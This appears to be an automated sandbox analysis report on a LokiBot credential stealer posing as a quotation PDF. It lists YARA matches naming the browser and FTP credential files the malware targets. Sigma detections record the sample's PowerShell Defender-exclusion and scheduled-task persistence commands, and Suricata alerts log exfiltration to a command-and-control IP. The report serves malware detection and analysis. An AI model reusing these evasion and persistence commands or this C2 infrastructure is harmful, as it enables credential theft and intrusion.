9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.mexnJkivovwH.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.mexnJkivovwH.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
13.2.mexnJkivovwH.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.mexnJkivovwH.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.mexnJkivovwH.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.mexnJkivovwH.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.mexnJkivovwH.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
13.2.mexnJkivovwH.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.mexnJkivovwH.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x75c10:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x62fdb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x725d4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x7281c:$a2: last_compatible_version
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x7181f:$des3: 68 03 66 00 00 0x75c10:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x75cdc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x74d56:$f1: FileZilla\recentservers.xml 0x74d96:$f2: FileZilla\sitemanager.xml 0x73006:$b2: Mozilla\Firefox\Profiles 0x72d70:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x72f1a:$s4: logins.json 0x73dc4:$s6: wand.dat 0x72844:$a1: username_value 0x72834:$a2: password_value 0x72e7f:$a3: encryptedUsername 0x72eec:$a3: encryptedUsername 0x72e92:$a4: encryptedPassword 0x72f00:$a4: encryptedPassword
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xd4430:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xc17fb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0xd0df4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0xd103c:$a2: last_compatible_version
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0xd003f:$des3: 68 03 66 00 00 0xd4430:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0xd44fc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0xd3576:$f1: FileZilla\recentservers.xml 0xd35b6:$f2: FileZilla\sitemanager.xml 0xd1826:$b2: Mozilla\Firefox\Profiles 0xd1590:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0xd173a:$s4: logins.json 0xd25e4:$s6: wand.dat 0xd1064:$a1: username_value 0xd1054:$a2: password_value 0xd169f:$a3: encryptedUsername 0xd170c:$a3: encryptedUsername 0xd16b2:$a4: encryptedPassword 0xd1720:$a4: encryptedPassword
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2a8c08:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x295fd3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x2a55cc:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x2a5814:$a2: last_compatible_version
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x2a4817:$des3: 68 03 66 00 00 0x2a8c08:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x2a8cd4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a7d4e:$f1: FileZilla\recentservers.xml 0x2a7d8e:$f2: FileZilla\sitemanager.xml 0x2a5ffe:$b2: Mozilla\Firefox\Profiles 0x2a5d68:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a5f12:$s4: logins.json 0x2a6dbc:$s6: wand.dat 0x2a583c:$a1: username_value 0x2a582c:$a2: password_value 0x2a5e77:$a3: encryptedUsername 0x2a5ee4:$a3: encryptedUsername 0x2a5e8a:$a4: encryptedPassword 0x2a5ef8:$a4: encryptedPassword
Click to see the 84 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ProcessId: 7524, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe, ParentImage: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe, ParentProcessId: 7908, ParentProcessName: mexnJkivovwH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp", ProcessId: 8080, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", ProcessId: 7604, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ProcessId: 7524, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation2025-0107pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation2025-0107pdf.exe, ParentProcessId: 7332, ParentProcessName: Quotation2025-0107pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp", ProcessId: 7604, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:01.519943+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:02.466654+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49737	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:00.796955+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.602114+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.490438+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.412187+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.187246+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:08.083804+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.974835+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:10.073415+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:11.223373+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:12.117368+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:13.004316+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.932697+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.805465+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.769592+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:16.694494+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.621099+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:18.524599+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:19.413561+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:20.319720+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.208840+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:22.190721+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:23.083462+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:23.973870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:24.880636+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:25.829746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:26.723358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:27.582510+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:28.619054+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:29.504390+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:30.382420+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.256603+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:32.155614+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:33.032901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:33.924411+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:34.814297+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:35.704114+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:36.588546+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:37.473584+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:38.360546+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.253004+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:40.116039+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:40.987508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:41.861754+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:42.736881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:43.630025+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49789	94.156.177.41	80	TCP
2025-01-07T12:32:44.529692+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49790	94.156.177.41	80	TCP
2025-01-07T12:32:45.411818+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49791	94.156.177.41	80	TCP
2025-01-07T12:32:46.293457+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2025-01-07T12:32:47.179130+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2025-01-07T12:32:48.074620+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2025-01-07T12:32:48.984690+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.41	80	TCP
2025-01-07T12:32:49.862472+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49796	94.156.177.41	80	TCP
2025-01-07T12:32:50.758629+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49798	94.156.177.41	80	TCP
2025-01-07T12:32:51.655150+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2025-01-07T12:32:52.567085+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2025-01-07T12:32:53.479625+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49801	94.156.177.41	80	TCP
2025-01-07T12:32:54.584481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49803	94.156.177.41	80	TCP
2025-01-07T12:32:55.446641+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49804	94.156.177.41	80	TCP
2025-01-07T12:32:56.333834+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49810	94.156.177.41	80	TCP
2025-01-07T12:32:57.237309+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2025-01-07T12:32:58.121179+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.41	80	TCP
2025-01-07T12:32:59.003527+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.41	80	TCP
2025-01-07T12:32:59.878899+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49837	94.156.177.41	80	TCP
2025-01-07T12:33:00.752916+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49843	94.156.177.41	80	TCP
2025-01-07T12:33:01.662274+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.41	80	TCP
2025-01-07T12:33:02.549471+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49857	94.156.177.41	80	TCP
2025-01-07T12:33:03.476176+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49863	94.156.177.41	80	TCP
